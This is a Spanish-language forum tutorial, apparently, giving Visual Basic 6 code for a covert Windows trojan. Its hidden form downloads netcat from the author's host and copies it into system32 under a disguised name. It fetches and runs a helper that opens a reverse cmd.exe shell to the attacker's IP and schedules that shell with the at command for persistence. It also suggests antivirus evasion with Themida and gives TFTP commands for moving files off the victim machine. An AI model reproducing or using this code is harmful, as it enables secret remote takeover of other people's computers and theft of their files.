Autor
Declaraciones:
Código:
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Const SW_NORMAL = 1
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long 'api necesaria para el descargar algo de internet
Option Explicit
en el evento load del formulario:
Código:
Private Sub Form_Load()
URLDownloadToFile 0, "http://usuarios.lycos.es/TU_USER/nc.exe", "C:\NC1.exe", 0, 0 'descargamos netcat desde nuestro host y lo ponemos en c:\ , el netcat para que pase muchisimo más desapersivido, pasale themida ;), que aunque pese 1mb, lo estamos descagarndo desde vb, no via navegador ;) y al descarga es algo más rapida y no visible ni x ventanas sino talvez por algunos fws, pero vereis que la mayoria de veces el netcat llegara a buen puerto, nod32 x ejemplo no me detectaba.
End Sub
timer con el que copiamos netcat a system32 o a donde quieras..mejor a system32
; tiene un intervalo de 45000 y esta en enabled = trueCódigo:
Private Sub Timer_copync_Timer()
On Error Resume Next
FileCopy "C:\NC1.exe", "C:\WINDOWS\system32\winnc.exe" 'copia el netcat a system32 en win xp
Timer_copync.Enabled = False
End Sub
el timer con el que vamos a ejecutar el nc con los parametros que queramos: ( de intervalo: 55000 y enabled = true )
Código:
Private Sub Timer_run_nc_Timer()
On Error Resume Next
Dim abrir As Long
URLDownloadToFile 0, "http://usuarios.lycos.es/TU_userNAME/wuauclt32.exe", "C:\wuauclt32.exe", 0, 0
abrir = ShellExecute(Me.hwnd, "Open", "C:\wuauclt32.exe", "", "", 1)
Timer_run_nc.Enabled = False
End Sub
pues lo que hace ese timer es tb descargar una app desde nuestro host y ejecutarla, que es esa aplicación ?? una app de no más de 2 lineas de codigo:
abrimos un nuevo projecto aparte de vb, y al form le damos esta propiedad: visible = false, un icono "camuflaje" y ya esta: luego en el form load:
Código:
on error resume next
Shell "cmd.exe /c winnc -d -e cmd.exe túip puerto ", vbHide
y ya, compilamos con p-code paar que el peso sea lo más bajo posible, aunque ya lo va ser...fijate en que es mui poco el codigo..., luego subimos a nuestro host este ejecutable que sera quien ejecute nuestro netcat, tb Debes subir el netcat a tu host
tb decir que la otra aplicacion: la que vamos a enviar, ella se encarga de: descargar netcat, copiarlo ar directorio del sistema, descargar la app que se encarga d ejecutarlo( en mi caso tiene este nombre:wuauclt32.exe ) , pues esa tb tenemos que poner el formulario en visible = false, logico!!
y para los que querais tener la seguridad de tener esa maquina controlada con nuestro netcat, vamos a hacerle esto pues es opcional, puedes tb hacerlo desd la shell asi. at 20:30 /every:L,M,Mi,J,V,S,D winnc -d -e cmd.exe túip puerto , con eso ya dejamos listo el netcat para que se ejecute con esa sintasis todos los dias de la semana ( L,M,Mi,J,V,S,D) a tal hora: 20:30 puse como ejemplo, podemos añadir mas horarios, las 24 horas de un día.
y de otro modo seria:
con un timer en nuestra app, más un bat ya programado con los horarios que queramos, ejemplo como puse: todos los dias ejecutamos netcat con esa sintasis, pero en ves de solo a las 20:30 , cada media hora: osea: 00:00, 00:30, 1:00, 1:30...y asi hasta que queramos, despues d tener el bat listo lo subimos a nuestro host.
Código:
timer_at_horarios_d_ejecución_Timer()
On Error Resume Next
Dim abrir As Long
URLDownloadToFile 0, "http://usuarios.lycos.es/tu_user/at.bat", "C:\at.bat", 0, 0
abrir = ShellExecute(Me.hWnd, "Open", "C:\at.bat", "", "", 1)
timer_at_horarios_d_ejecución.enabled = false
end sub
ese timer descarga de nuestro host un bat ya programado por nosotros anteriormente, con los horarios, dias y sintasis con las que se va a ejecutar netcat en nuestro sistema, de intervalo? ponle el que quieras: bueno mejor: minimo 1000( 1seg)
, luego si quieres podrias ponerle tb: para que se registre nuestra app con windows, que cheke si esun winxp o 2k y segun pues se copia y crea key con distintos nombres o no se copia etc, tb puedes, añadirle la funcion de que se agrege a la lista de programas permitidos por el fw d windows, tb con un bat que descarge nuestra app, tb ( ojo con esto ) desde que inicie la app con windows, x ejemplo porque no quieras iniciar el netcat con el comando at como explique, y pones timers date cuenta que en el proximo inicio d windows va a volver a ejeuctar todos los timers y repetir el mismo proceso..osea todo..descargar netcat, copiarlo...etc etc( segun lo que hayas puesto ) , pues para solucionar eso, basta con al final de cada timer como ejemplo pongo el primer timer:
Código:
Private Sub Timer_copync_Timer()
On Error Resume Next
FileCopy "C:\NC1.exe", "C:\WINDOWS\system32\winnc.exe" 'copia el netcat a system32 en win xp
Open "C:\chek_4_file_exist.xD" For Random As #1
Close #1
Timer_copync.Enabled = False
End Sub
con esto: Open "C:\chek_4_file_exist.xD" For Random As #1
Close #1
creamos un file en c:\ con ese nombre que nos va a servir para esto:
en el form:
Código:
Private Sub Form_Load()
URLDownloadToFile 0, "http://usuarios.lycos.es/TU_USER/nc.exe", "C:\NC1.exe", 0, 0
If Dir("C:\chek_4_file_exist.xD") <> "" Then
'
Timer_copync.Enabled = False
Else
Timer_copync.Enabled = True
End If
'ahora con ese codigo en el form le decimos que si ese archivo existe no ejecute el timer de nuevo y si el file no existe pues si ejecutamos el timer
End Sub
solo decir tambien que si hace eso, los timers que tengan esas funciones, de descargar files, ejecutar un file, copiarse a systemfolder etc, Debes ponerlos en enabled = FALSE, para que cuando cheke si existe o no ese file, pues lo ponga en TRUE o deje en FALSE, ya estamos terminando y ahora para los que diran bueno y cuando tenga la shell que hago?
pues usa el comando ---> help
nociones básicas; cd.. para bajar de directorio, cd para esclar a un directorio ejemplos: estamos en: c:\documents and settings\tuUser\mis documentos> y quieres llegar a.. C:\ pues haces esto: cd.. + enter y estaras en:c:\documents and settings\tuUser> cd.. = c:\documents and settings>cd.. = C:\
quieres escalar de c:\ a documents and settings x ejemplo ?? pues: c:\> cd documents and settings = c:\documents and settings> , con eso ya podras moverte por los directorios y curiosear ya luego demas comandos vete practicandolos help y tienes la ayuda, comando /? su ayuda, ya veras que es fácil
y para quienes digan vale muchas gracias..pero ahora como subo y bajo archivos ??
fácil, te bajas el server TFTP d solarwinds.net ( es free ), lo instalas, configuras, selecionas una carpeta donde vamos a depositar los archivos que queramos subir y donde alojar las descargas y cuando ya lo tengas eso vamos con las sintasis para upload & download ( NOTA: Debes tener abierto el puerto: 69 udp y sino es asi..abrelo )
dsd la shell de la maquina X ejecutamos para un upload : tftp.exe -i túip GET "h4ack.bat" c:\h4ackRecibed.bat
para un download:
tftp.exe -i túip PUT c:\documents and settings\user_pc_XX\documentos\h4ck.jpg "recibido_n_mi_compu.jpg"
y eso es todo, si se me ha escapado algo o algun fallo lo comentan para correjirlo, espero que les guste este codectutorial o como lo quieran llamar xD, son solo ideas, practica, no hagan mal con esta información yo no lo he escrito para eso, salu2
by AililiA
En línea
